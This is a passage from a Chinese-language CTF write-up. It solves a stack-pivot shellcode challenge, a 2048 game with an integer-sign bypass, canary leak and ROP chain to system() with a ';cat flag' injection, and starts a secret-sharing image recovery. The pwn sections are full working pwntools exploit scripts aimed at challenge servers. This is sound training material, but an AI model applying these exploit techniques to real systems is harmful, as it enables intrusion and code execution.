RBP<\/code>\uff08\u4e5f\u5c31\u662f <code>FAKE_RBP<\/code>\uff09\u5f39\u5165 <code>rbp<\/code> \u5bc4\u5b58\u5668\u3002<\/li>\n\n\n\n<li>\u6267\u884c <code>ret<\/code>\uff0c\u8df3\u8f6c\u5230 <code>0x189b<\/code>\u3002<\/li>\n<\/ol>\n<\/li>\n\n\n\n<li>\u56de\u5230 <code>main<\/code> (0x189b)\uff1a\n<ol class=\"wp-block-list\">\n<li>\u7ee7\u7eed\u6267\u884c\uff0c\u9047\u5230 <code>0x189e<\/code> \u7684 <code>leave<\/code> \u6307\u4ee4\u3002<\/li>\n\n\n\n<li><code>leave<\/code> \u6267\u884c <code>mov rsp, rbp<\/code>\u3002\u6b64\u65f6 <code>rbp<\/code> \u5df2\u7ecf\u662f\u6211\u4eec\u7684 <code>FAKE_RBP<\/code>\u3002<\/li>\n\n\n\n<li><strong>\u6808\u8fc1\u79fb\u6210\u529f\uff01<\/strong> <code>rsp<\/code> \u88ab\u52ab\u6301\u5230\u4e86 <code>FAKE_RBP<\/code>\u3002<\/li>\n\n\n\n<li><code>leave<\/code> 
\u7ee7\u7eed\u6267\u884c <code>pop rbp<\/code>\uff0c<code>rsp<\/code> \u6307\u5411 <code>FAKE_RBP + 8<\/code>\u3002<\/li>\n\n\n\n<li><code>ret<\/code> \u6267\u884c <code>pop rip<\/code>\uff0c\u4ece <code>FAKE_RBP + 8<\/code> \u5904\u53d6\u51fa\u5730\u5740\u5e76\u8df3\u8f6c\u3002<\/li>\n<\/ol>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p><strong>3. Shellcode \u5e03\u5c40<\/strong><\/p>\n\n\n\n<p>\u7531\u4e8e PIE \u548c ASLR\uff0c\u6211\u4eec\u5f88\u96be\u5728\u5806\u6808\u4e0a\u627e\u5230\u56fa\u5b9a\u7684 shellcode \u5730\u5740\u3002\u4f46\u662f\u9898\u76ee\u63d0\u4f9b\u4e86\u4e00\u4e2a\u7279\u6b8a\u7684\u56fa\u5b9a\u5730\u5740\u5185\u5b58\u533a\u57df\uff1a<strong>0x114514000<\/strong>\u3002<code>read_line_from_fd<\/code> \u5141\u8bb8\u6211\u4eec\u5728 <code>main<\/code> \u5f00\u59cb\u65f6\u5411\u8fd9\u4e2a\u5730\u5740\u5199\u5165 16 \u5b57\u8282\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Stage 1 Payload (\u4f4d\u4e8e 0x114514000)<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u524d 8 \u5b57\u8282\uff1a<strong>Stage 1 Shellcode<\/strong>\u3002<\/li>\n\n\n\n<li>\u540e 8 \u5b57\u8282\uff1a<strong>\u6307\u9488<\/strong>\uff0c\u6307\u5411 <code>0x114514000<\/code>\u3002<\/li>\n\n\n\n<li><strong>FAKE_RBP<\/strong> \u8bbe\u7f6e\u4e3a <strong>0x114514000<\/strong>\u3002<\/li>\n\n\n\n<li>\u5f53 <code>main<\/code> \u6267\u884c <code>ret<\/code> \u65f6\uff0c\u5b83\u4ece <code>FAKE_RBP + 8<\/code>\uff08\u5373 <code>0x114514008<\/code>\uff09\u8bfb\u53d6\u5730\u5740\u3002\u8be5\u5904\u5b58\u653e\u7740\u6307\u9488 <code>0x114514000<\/code>\u3002<\/li>\n\n\n\n<li>\u4e8e\u662f\u7a0b\u5e8f\u8df3\u8f6c\u5230 <code>0x114514000<\/code>\uff0c\u5f00\u59cb\u6267\u884c Stage 1 Shellcode\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Stage 1 Shellcode \u529f\u80fd<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u7531\u4e8e\u7a7a\u95f4\u53ea\u6709 8 
\u5b57\u8282\uff0c\u6211\u4eec\u9700\u8981\u6781\u5176\u7cbe\u7b80\u7684\u6c47\u7f16\u4ee3\u7801\u3002<\/li>\n\n\n\n<li>\u5229\u7528 <code>push rsp; pop rsi<\/code> \u83b7\u53d6\u5f53\u524d\u6808\u6307\u9488\uff08\u6b64\u65f6\u6307\u5411 <code>0x114514010<\/code>\uff09\u3002<\/li>\n\n\n\n<li>\u8c03\u7528 <code>read(0, rsi, 255)<\/code> \u8bfb\u53d6\u540e\u7eed\u7684 Stage 2 Shellcode \u5230 <code>0x114514010<\/code>\u3002<\/li>\n\n\n\n<li>\u76f4\u63a5\u8df3\u8f6c\u5230 <code>rsi<\/code> \u6267\u884c Stage 2\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Stage 2 Shellcode<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u6807\u51c6\u7684 ORW (Open \/flag, Read, Write) Shellcode\u3002\u811a\u672c\u91cc read\/write \u90fd\u4ee5 rsp \u4f5c\u7f13\u51b2\u533a\uff0c\u800c\u6b64\u65f6 rsp \u5c31\u6307\u5411 Stage 2 \u81ea\u8eab\u6240\u5728\u7684 <code>0x114514010<\/code> \u9644\u8fd1\uff0c\u8bfb\u5165\u7684 flag \u53ef\u80fd\u8986\u76d6\u5176\u540e\u5c1a\u672a\u6267\u884c\u7684\u6307\u4ee4\uff1b\u66f4\u7a33\u59a5\u7684\u662f\u628a\u7f13\u51b2\u533a\u653e\u5230\u8fdc\u79bb\u4ee3\u7801\u7684\u4f4d\u7f6e\uff08\u5982 <code>rsp+0x100<\/code>\uff09\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p><strong>4. PIE Leak<\/strong><\/p>\n\n\n\n<p>\u4e3a\u4e86\u6784\u9020\u6b63\u786e\u7684 Return Address (<code>base + 0x189b<\/code>)\uff0c\u6211\u4eec\u9700\u8981 PIE \u57fa\u5740\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7a0b\u5e8f\u5728 <code>print_gift_prompt_with_addrs<\/code> \u4e2d\u6cc4\u9732\u4e86 <code>main<\/code> \u51fd\u6570\u7684\u5730\u5740\u3002<\/li>\n\n\n\n<li>\u6211\u4eec\u8bfb\u53d6\u8be5\u6cc4\u6f0f\u5730\u5740\uff0c\u51cf\u53bb\u504f\u79fb <code>0x184f<\/code> \u5f97\u5230 PIE Base\u3002<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>import time<br>\u200b<br>context.arch = 'amd64'<br>context.log_level = 'info'<br>binary_path = '.\/baby_stack'<br>\u200b<br>def get_process():<br> &nbsp; &nbsp;# return process(binary_path) <br> &nbsp; &nbsp;return remote('challenge.bluesharkinfo.com', 28923)<br>\u200b<br>def exploit():<br> &nbsp; &nbsp;# &nbsp; push rsp; pop rsi  -&gt; rsi = 0x114514010 <br> &nbsp; &nbsp;# &nbsp; mov dl, 0xff &nbsp; &nbsp; &nbsp; -&gt; Count = 255<br> &nbsp; &nbsp;# &nbsp; syscall &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  -&gt; read(0, 0x114514010, 255) (rax=0, rdi=0 assumed)<br> &nbsp; &nbsp;# &nbsp; jmp rsi &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  -&gt; Jump to 0x114514010<br> 
&nbsp; &nbsp;#<br> &nbsp; &nbsp;# Bytes: 54 5e b2 ff 0f 05 ff e6<br> &nbsp; &nbsp;shellcode_s1 = b\"\\x54\\x5e\\xb2\\xff\\x0f\\x05\\xff\\xe6\"<br> &nbsp; &nbsp;payload_1 = shellcode_s1 + p64(0x114514000)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;p = get_process()<br> &nbsp; &nbsp;<br>\u200b<br> &nbsp; &nbsp;p.send(payload_1)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;p.recvuntil(b\"DO YOU LIKE GIFT?\\n\")<br> &nbsp; &nbsp;try:<br> &nbsp; &nbsp; &nbsp; &nbsp;leak_data = p.recv(6)<br> &nbsp; &nbsp; &nbsp; &nbsp;main_leak = u64(leak_data.ljust(8, b'\\x00'))<br> &nbsp; &nbsp; &nbsp; &nbsp;print(f\"&#91;+] Leaked main addr: {hex(main_leak)}\")<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;base_addr = main_leak - 0x184f<br> &nbsp; &nbsp; &nbsp; &nbsp;print(f\"&#91;+] PIE Base: {hex(base_addr)}\")<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;target_ret = base_addr + 0x189b<br> &nbsp; &nbsp; &nbsp; &nbsp;print(f\"&#91;+] Target Ret Addr: {hex(target_ret)}\")<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;p.clean(timeout=0.1)<br> &nbsp; &nbsp;except Exception as e:<br> &nbsp; &nbsp; &nbsp; &nbsp;print(f\"&#91;-] Leak failed: {e}\")<br> &nbsp; &nbsp; &nbsp; &nbsp;p.close()<br> &nbsp; &nbsp; &nbsp; &nbsp;return<br>\u200b<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;pivot_payload = b'A' * 264 + b'B' * 8 + p64(0x114514000) + p64(target_ret) + b'\\n'<br> &nbsp; &nbsp;p.send(pivot_payload)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;print(\"&#91;*] Payload sent. 
Waiting for Stack Pivot...\")<br>\u200b<br> &nbsp; &nbsp;print(\"&#91;*] Sending Stage 2 (ORW)...\")<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;orw = shellcraft.open('\/flag', 0)<br> &nbsp; &nbsp;orw += shellcraft.read('rax', 'rsp', 100)<br> &nbsp; &nbsp;orw += shellcraft.write(1, 'rsp', 100)<br>\u200b<br> &nbsp; &nbsp;p.send(b'\\x90'*16 + asm(orw))<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;p.interactive()<br>\u200b<br>if __name__ == '__main__':<br> &nbsp; &nbsp;exploit()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Molly<\/h2>\n\n\n\n<p><strong>\u7a0b\u5e8f\u903b\u8f91<\/strong><\/p>\n\n\n\n<p>\u7a0b\u5e8f\u662f\u4e00\u4e2a\u7b80\u5355\u7684 2048 \u6e38\u620f\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Main \u51fd\u6570<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u8f93\u5165\u540d\u5b57\uff0c\u5b58\u50a8\u5728\u5168\u5c40\u53d8\u91cf <code>buf<\/code> (0x404a40) \u4e2d\u3002<\/li>\n\n\n\n<li>\u6784\u9020\u6b22\u8fce\u5b57\u7b26\u4e32 &#8220;Hello, [name], &#8230;&#8221;\u3002<\/li>\n\n\n\n<li>\u8fdb\u5165\u6e38\u620f\u5faa\u73af <code>playgame()<\/code>\u3002<\/li>\n\n\n\n<li>\u6e38\u620f\u7ed3\u675f\u540e\u8c03\u7528 <code>final()<\/code>\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Playgame \u51fd\u6570<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u6b63\u5e38\u7684 2048 \u903b\u8f91\u3002<\/li>\n\n\n\n<li>\u8f93\u5165 &#8216;q&#8217; \u53ef\u4ee5\u9000\u51fa\u5f53\u524d\u5c40\uff0c\u4f46\u662f <code>score<\/code> \u4f1a\u51cf 10\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Final \u51fd\u6570<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u68c0\u67e5\u5206\u6570\uff1a<code>if ( (unsigned int)score &lt;= 100000 )<\/code>\uff0c\u5982\u679c\u5206\u6570\u4e0d\u8fbe\u6807\u5219\u5931\u8d25\u3002<\/li>\n\n\n\n<li>\u5982\u679c\u5206\u6570\u8fbe\u6807\uff0c\u8fdb\u5165 <code>shell()<\/code> \u51fd\u6570\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>Shell \u51fd\u6570<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u4e00\u4e2a\u6a21\u62df\u7684 
shell\uff0c\u652f\u6301 <code>ls<\/code> \u548c <code>exit<\/code>\u3002<\/li>\n\n\n\n<li>\u5b58\u5728 <strong>\u6808\u6ea2\u51fa\u6f0f\u6d1e<\/strong>\uff1a<code>read(0, buf, 0x128uLL)<\/code>\uff0c\u800c <code>buf<\/code> \u5927\u5c0f\u53ea\u6709 144 \u5b57\u8282 (0x90)\uff0c\u4e14 Canary \u4fdd\u62a4\u5f00\u542f\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p><code>score<\/code> \u662f\u4e00\u4e2a\u6709\u7b26\u53f7\u6574\u6570\uff08\u521d\u59cb 50\uff09\u3002\u6bcf\u6b21 &#8216;q&#8217; \u9000\u51fa\u51cf 10\u3002 \u5982\u679c\u5728 <code>final()<\/code> \u4e2d\u68c0\u67e5\u65f6\u88ab\u5f3a\u5236\u8f6c\u6362\u4e3a <code>unsigned int<\/code>\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>if ( (unsigned int)score &lt;= 0x1869F )<\/code><\/pre>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u591a\u6b21 &#8216;q&#8217; \u5c06\u5206\u6570\u51cf\u81f3\u8d1f\u6570\uff08\u4f8b\u5982 -10\uff09\u3002 -10 \u7684\u8865\u7801\u8868\u793a\u4e3a\u65e0\u7b26\u53f7\u6574\u6570\u662f\u4e00\u4e2a\u975e\u5e38\u5927\u7684\u6570\u5b57\uff080xFFFFFFF6 = 4294967286\uff09\uff0c\u8fdc\u5927\u4e8e 100000\u3002 \u4ece\u800c\u7ed5\u8fc7\u5206\u6570\u68c0\u67e5\uff0c\u8fdb\u5165 <code>shell()<\/code>\u3002<\/p>\n\n\n\n<p>\u8fdb\u5165 <code>shell()<\/code> \u540e\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Leak Canary &amp; RBP<\/strong>:\n<ul class=\"wp-block-list\">\n<li><code>buf<\/code> \u4f4d\u4e8e <code>rbp-0x90<\/code>\uff0cCanary \u4f4d\u4e8e <code>rbp-0x8<\/code>\u3002\u8ddd\u79bb\u4e3a 136 \u5b57\u8282\u3002<\/li>\n\n\n\n<li>Canary \u7684\u7b2c\u4e00\u4e2a\u5b57\u8282\u901a\u5e38\u662f <code>\\x00<\/code>\u3002<\/li>\n\n\n\n<li>\u53d1\u9001 137 \u5b57\u8282\uff08\u586b\u5145 136 \u5b57\u8282 + 1 \u5b57\u8282\u8986\u76d6 Canary \u7684 <code>\\x00<\/code>\uff09\uff0c\u5229\u7528\u7a0b\u5e8f\u7684\u8f93\u51fa\u529f\u80fd\u6cc4\u9732 Canary \u548c\u968f\u540e\u7684 RBP\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u6784\u9020 ROP<\/strong>:\n<ul 
class=\"wp-block-list\">\n<li>\u76ee\u6807\u662f\u6267\u884c <code>system(\"\/bin\/sh\")<\/code> \u6216 <code>system(\"cat flag\")<\/code>\u3002<\/li>\n\n\n\n<li>\u7a0b\u5e8f\u5f00\u542f\u4e86 NX\uff0c\u4e0d\u80fd\u76f4\u63a5\u6267\u884c shellcode\u3002<\/li>\n\n\n\n<li>\u5229\u7528 <code>pop rdi; ret<\/code> gadget \u8c03\u7528 <code>system<\/code>\u3002<\/li>\n\n\n\n<li><strong>\u53c2\u6570\u6784\u9020\u6280\u5de7<\/strong>:\n<ul class=\"wp-block-list\">\n<li>\u7a0b\u5e8f\u5f00\u5934\u8f93\u5165\u7684 <code>name<\/code> \u5b58\u50a8\u5728\u56fa\u5b9a\u5730\u5740\u7684\u5168\u5c40\u53d8\u91cf <code>0x404a40<\/code> \u4e2d\u3002<\/li>\n\n\n\n<li>\u6211\u4eec\u5728\u8f93\u5165\u540d\u5b57\u65f6\u6784\u9020 <code>;cat flag<\/code>\uff08\u6216\u8005 <code>;sh<\/code>\uff09\u3002<\/li>\n\n\n\n<li>\u5168\u5c40\u53d8\u91cf\u5185\u5bb9\u53d8\u4e3a <code>Hello,;cat flag,...<\/code>\u3002<\/li>\n\n\n\n<li>\u8c03\u7528 <code>system(0x404a40)<\/code> \u65f6\uff0cshell \u4f1a\u5148\u5c1d\u8bd5\u6267\u884c <code>Hello<\/code>\uff08\u547d\u4ee4\u672a\u627e\u5230\uff09\uff0c\u7136\u540e\u6267\u884c <code>;<\/code> \u540e\u7684 <code>cat flag<\/code>\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>context.arch = 'amd64'<br>context.log_level = 'debug'<br>\u200b<br>pop_rdi = 0x40133e<br>ret_gadget = 0x40133f<br>system_plt = 0x401170<br>buf_addr_global = 0x404a40 <br>\u200b<br>def exploit():<br> &nbsp; &nbsp;try:<br> &nbsp; &nbsp; &nbsp; &nbsp;# r = process('.\/ez2048')<br> &nbsp; &nbsp; &nbsp; &nbsp;r = remote('challenge.bluesharkinfo.com', 23585)<br> &nbsp; &nbsp; &nbsp; &nbsp;r.recvuntil(b\"input your name\\n&gt;\")<br> &nbsp; &nbsp; &nbsp; &nbsp;r.sendline(b\";cat flag\")<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;r.recvuntil(b\"Press \\\"Enter\\\" to start the game\")<br> &nbsp; &nbsp; &nbsp; &nbsp;r.send(b\"\\n\")<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;for i in range(5):<br> &nbsp; &nbsp; &nbsp; &nbsp; 
&nbsp; &nbsp;r.send(b'q\\nc\\n')<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r.recvuntil(b\"start a new round\\n&gt;\")<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;r.send(b'q\\nQ\\n')<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;r.recvuntil(b\"here is your shell\")<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;r.recvuntil(b\"$ \")<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;payload_leak = b'A' * 137<br> &nbsp; &nbsp; &nbsp; &nbsp;r.send(payload_leak)<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;r.recvuntil(b\"executing command: \")<br> &nbsp; &nbsp; &nbsp; &nbsp;leak_data = r.recvuntil(b\"command not found\", drop=True)<br> &nbsp; &nbsp; &nbsp; &nbsp;r.recvuntil(b\"$ \")<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;if leak_data.endswith(b'\\n'):<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;leak_data = leak_data&#91;:-1]<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;if len(leak_data) &lt; 137 + 7:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;log.error(\"Leak failed\")<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;return<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;canary_fragment = leak_data&#91;137:137+7]<br> &nbsp; &nbsp; &nbsp; &nbsp;canary = b'\\x00' + canary_fragment<br> &nbsp; &nbsp; &nbsp; &nbsp;log.success(f\"Canary: {canary.hex()}\")<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;rbp_fragment = leak_data&#91;137+7:]<br> &nbsp; &nbsp; &nbsp; &nbsp;if len(rbp_fragment) &gt; 8:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;rbp_fragment = rbp_fragment&#91;:8]<br> &nbsp; &nbsp; &nbsp; &nbsp;saved_rbp = u64(rbp_fragment.ljust(8, b'\\x00'))<br> &nbsp; &nbsp; &nbsp; &nbsp;log.success(f\"Saved RBP: {hex(saved_rbp)}\")<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;payload = b'A' * 136<br> &nbsp; &nbsp; &nbsp; &nbsp;payload += canary<br> &nbsp; &nbsp; &nbsp; &nbsp;payload += p64(saved_rbp)<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;payload += 
p64(pop_rdi)<br> &nbsp; &nbsp; &nbsp; &nbsp;payload += p64(buf_addr_global) <br> &nbsp; &nbsp; &nbsp; &nbsp;payload += p64(ret_gadget) &nbsp; &nbsp; <br> &nbsp; &nbsp; &nbsp; &nbsp;payload += p64(system_plt)<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;r.sendline(payload)<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp; &nbsp; &nbsp;r.interactive()<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;except Exception as e:<br> &nbsp; &nbsp; &nbsp; &nbsp;log.error(f\"Error: {e}\")<br>\u200b<br>if __name__ == \"__main__\":<br> &nbsp; &nbsp;exploit()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Image_is_all_you_need<\/h2>\n\n\n\n<p>\u89e3\u9898\u8fc7\u7a0b\u5206\u4e3a\u4e24\u6b65\uff1a\u9996\u5148\u5229\u7528\u5bc6\u7801\u5b66\u77e5\u8bc6\u6062\u590d\u51fa\u5b8c\u6574\u7684\u9690\u5199\u56fe\u7247 <code>secret.png<\/code>\uff0c\u7136\u540e\u5229\u7528 AI \u6a21\u578b\u4ece\u4e2d\u63d0\u53d6\u51fa Flag\u3002<\/p>\n\n\n\n<p><strong>\u7b2c\u4e00\u6b65\uff1a\u6062\u590d Secret \u56fe\u7247<\/strong><\/p>\n\n\n\n<p><strong>\u903b\u8f91\u5206\u6790<\/strong><\/p>\n\n\n\n<p>\u901a\u8fc7\u9605\u8bfb <code>share_secret.py<\/code>\uff0c\u6211\u4eec\u53d1\u73b0\u5b83\u5b9e\u73b0\u4e86\u4e00\u4e2a\u57fa\u4e8e\u6a21 257 \u57df\u7684 Lagrange \u63d2\u503c\u79d8\u5bc6\u5171\u4eab\u65b9\u6848\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>\u52a0\u5bc6\u8fc7\u7a0b<\/strong>\uff1a\n<ul class=\"wp-block-list\">\n<li>\u50cf\u7d20\u503c $P$ \u4e0e\u591a\u9879\u5f0f $f(x)$ \u7ed3\u5408\uff1a$S_i = (P + f(i)) \\pmod{257}$\u3002<\/li>\n\n\n\n<li>\u5bf9\u4e8e\u8ba1\u7b97\u7ed3\u679c\u4e3a 256 \u7684\u7279\u6b8a\u60c5\u51b5\uff08\u56e0\u4e3a\u56fe\u7247\u662f uint8\uff0c\u6700\u5927 255\uff09\uff0c\u811a\u672c\u5c06\u5176\u5b58\u4e3a 0\uff0c\u5e76\u5c06\u4f4d\u7f6e\u7d22\u5f15\u8bb0\u5f55\u5728 PNG \u7684 <code>tEXt<\/code> \u5757\u4e2d\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><strong>\u89e3\u5bc6\u601d\u8def<\/strong>\uff1a\n<ul 
class=\"wp-block-list\">\n<li>\u8bfb\u53d6 6 \u5f20\u56fe\u7247\u7684\u50cf\u7d20\u6570\u636e\u3002<\/li>\n\n\n\n<li>\u8bfb\u53d6\u6bcf\u5f20\u56fe\u7247 <code>tEXt<\/code> \u5757\u4e2d\u7684\u989d\u5916\u4fe1\u606f\uff0c\u5c06\u5bf9\u5e94\u4f4d\u7f6e\u7684\u50cf\u7d20\u8fd8\u539f\u4e3a 256\u3002<\/li>\n\n\n\n<li>\u5bf9\u6bcf\u4e2a\u50cf\u7d20\u4f4d\u7f6e\uff0c\u5229\u7528 6 \u4e2a\u70b9\u7684 $(x, y)$ \u5750\u6807\uff08$x$ \u4e3a 1~6\uff0c$y$ \u4e3a\u50cf\u7d20\u503c\uff09\uff0c\u4f7f\u7528 Lagrange \u63d2\u503c\u516c\u5f0f\u8ba1\u7b97 $x=0$ \u5904\u7684\u503c\uff0c\u5373\u4e3a\u539f\u59cb\u50cf\u7d20\u503c\u3002<\/li>\n\n\n\n<li>\u6a21\u8fd0\u7b97\u9700\u8981\u5728 mod 257 \u4e0b\u8fdb\u884c\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p><strong>\u6062\u590d\u811a\u672c<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import png<br>import numpy as np<br>from PIL import Image<br>import os<br>\u200b<br>def read_text_chunk(src_png):<br> &nbsp; &nbsp;reader = png.Reader(filename=src_png)<br> &nbsp; &nbsp;chunks = reader.chunks()<br> &nbsp; &nbsp;chunk_list = list(chunks)<br> &nbsp; &nbsp;for chunk_type, chunk_data in chunk_list:<br> &nbsp; &nbsp; &nbsp; &nbsp;if chunk_type == b'tEXt':<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;data = chunk_data<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if b'\\x00' in data:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;keyword, text = data.split(b'\\x00', 1)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;decoded = text.decode('utf-8', errors='ignore')<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;else:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;decoded = data.decode('utf-8', errors='ignore')<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if decoded.startswith('&#91;') and decoded.endswith(']'):<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 
&nbsp; &nbsp; &nbsp; &nbsp;return eval(decoded)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;except:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;continue<br> &nbsp; &nbsp;return &#91;]<br>\u200b<br>def modInverse(n, mod):<br> &nbsp; &nbsp;return pow(int(n), mod - 2, mod)<br>\u200b<br>def solve():<br> &nbsp; &nbsp;n = 6<br> &nbsp; &nbsp;mod = 257<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# \u8bfb\u53d6\u7b2c\u4e00\u5f20\u56fe\u83b7\u53d6\u5c3a\u5bf8<br> &nbsp; &nbsp;img1 = Image.open(\"secret_1.png\")<br> &nbsp; &nbsp;data1 = np.asarray(img1)<br> &nbsp; &nbsp;shape = data1.shape<br> &nbsp; &nbsp;num_pixels = data1.size<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;pixel_data = np.zeros((n, num_pixels), dtype=int)<br> &nbsp; &nbsp;extras = &#91;]<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;print(\"Loading shares...\")<br> &nbsp; &nbsp;for i in range(n):<br> &nbsp; &nbsp; &nbsp; &nbsp;fname = f\"secret_{i+1}.png\"<br> &nbsp; &nbsp; &nbsp; &nbsp;extras.append(set(read_text_chunk(fname)))<br> &nbsp; &nbsp; &nbsp; &nbsp;img = Image.open(fname)<br> &nbsp; &nbsp; &nbsp; &nbsp;pixel_data&#91;i] = np.asarray(img).flatten()<br> &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;print(\"Reconstructing...\")<br> &nbsp; &nbsp;Y = pixel_data.copy().astype(int)<br> &nbsp; &nbsp;<br> &nbsp; &nbsp;# \u6062\u590d 256 \u7684\u503c<br> &nbsp; &nbsp;for i in range(n):<br> &nbsp; &nbsp; &nbsp; &nbsp;if extras&#91;i]:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;indices = &#91;idx for idx in list(extras&#91;i]) if idx &lt; num_pixels]<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Y&#91;i, indices] = 256<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;# Lagrange \u63d2\u503c x=0<br> &nbsp; &nbsp;xs = list(range(1, n + 1))<br> &nbsp; &nbsp;coeffs = &#91;]<br> &nbsp; &nbsp;for i in range(n):<br> &nbsp; &nbsp; &nbsp; &nbsp;numerator = 1<br> &nbsp; &nbsp; &nbsp; &nbsp;denominator = 1<br> &nbsp; &nbsp; &nbsp; &nbsp;for j in range(n):<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if i == j: 
